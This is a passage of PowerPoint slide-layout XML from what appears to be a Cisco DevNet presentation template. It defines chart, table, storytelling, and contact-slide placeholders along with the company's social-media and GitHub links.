            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="32994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1529862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8_Half_Page_Chart">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Chart Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="503238"/>
            <a:ext cx="3559175" cy="4087812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3179921"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4645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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-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221695170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9_Half_Page_Table">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>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Table Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="503238"/>
            <a:ext cx="3559175" cy="4087812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3407027"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413089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Storytelling">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610100" y="609601"/>
            <a:ext cx="0" cy="3984625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat"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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463764" y="1439061"/>
            <a:ext cx="3820348" cy="2265389"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="61715" tIns="34288" rIns="61715" bIns="34288" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="685731" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Ciscolight" pitchFamily="2" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922521" y="654518"/>
            <a:ext cx="3865880" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1500"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1500"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1500"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1500"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409709" y="4884990"/>
            <a:ext cx="359666" cy="274637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr lang="en-US" sz="600" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="CiscoSans Thin"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{640853F4-1BAF-3540-A54F-96D28F764CCD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385778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ocial Media Contac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5A1BC9F-B5AD-B147-BA51-6B169F6BC974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4177122" y="1422400"/>
            <a:ext cx="2083902" cy="1959304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D4E213-7CF4-6941-B2D0-5FF593988BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385568" y="1883898"/>
            <a:ext cx="2397686" cy="1497806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter Handle</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GitHub Link</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linked In Link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB00F3A-25D3-4F4B-BAFF-D5F7DBFC5ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815769" y="1163125"/>
            <a:ext cx="2569136" cy="1859621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B81C284A-AD2A-AD43-8CC9-F51A6C7BC078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6509108" y="4313198"/>
            <a:ext cx="2411488" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="42862" lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>developer.cisco.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D3A5C"/>
              </a:solidFill>
              <a:latin typeface="CiscoSans ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7698D641-4E2F-B74D-8F84-F7779A22E4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="496343"/>
            <a:ext cx="6574156" cy="41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68" tIns="34284" rIns="68568" bIns="34284" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="3733" b="0" i="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="609585" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1219170" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1828754" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2438339" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Connect with Us and share Your Story…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="897025" y="3462750"/>
            <a:ext cx="3351389" cy="1151980"/>
            <a:chOff x="1196034" y="4810961"/>
            <a:chExt cx="4468518" cy="1535973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Text Placeholder 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAAC206-9A88-3D48-959A-E87754796B68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1528602" y="4810961"/>
              <a:ext cx="4135950" cy="1418214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lst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2862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CiscoDevNet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DevNetExpress</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>facebook.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ciscodevnet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/ </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>http://github.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CiscoDevNet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95779378-9FE7-1E41-B181-1DD9A65E538F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"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229910" y="5242933"/>
              <a:ext cx="298692" cy="298692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
